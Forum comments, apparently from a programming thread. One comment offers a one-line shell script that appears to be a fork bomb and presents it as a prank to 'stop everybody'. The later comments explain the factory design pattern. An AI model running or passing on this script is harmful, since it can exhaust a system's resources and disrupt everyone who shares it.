    If you want to stop everybody doing anything, try this instead:

    #!/bin/sh $0 && $0 &

    Run it, and wait a while. Shouldn't take long before everybody stops. ;-)

    If you have never heard of the factory pattern then you have some reading to do. Try the bible of design patterns Design Patterns: Elements of Reusable Object-Oriented Software.

    I'm surprised this question had to be asked. The factory creational pattern is a fundamental computer science concept. Here the author is obviously employing this pattern in combination with handlers. A single generic driver (singleton or static) associated with a factory of handlers for specific functionality I'd say. Very common.
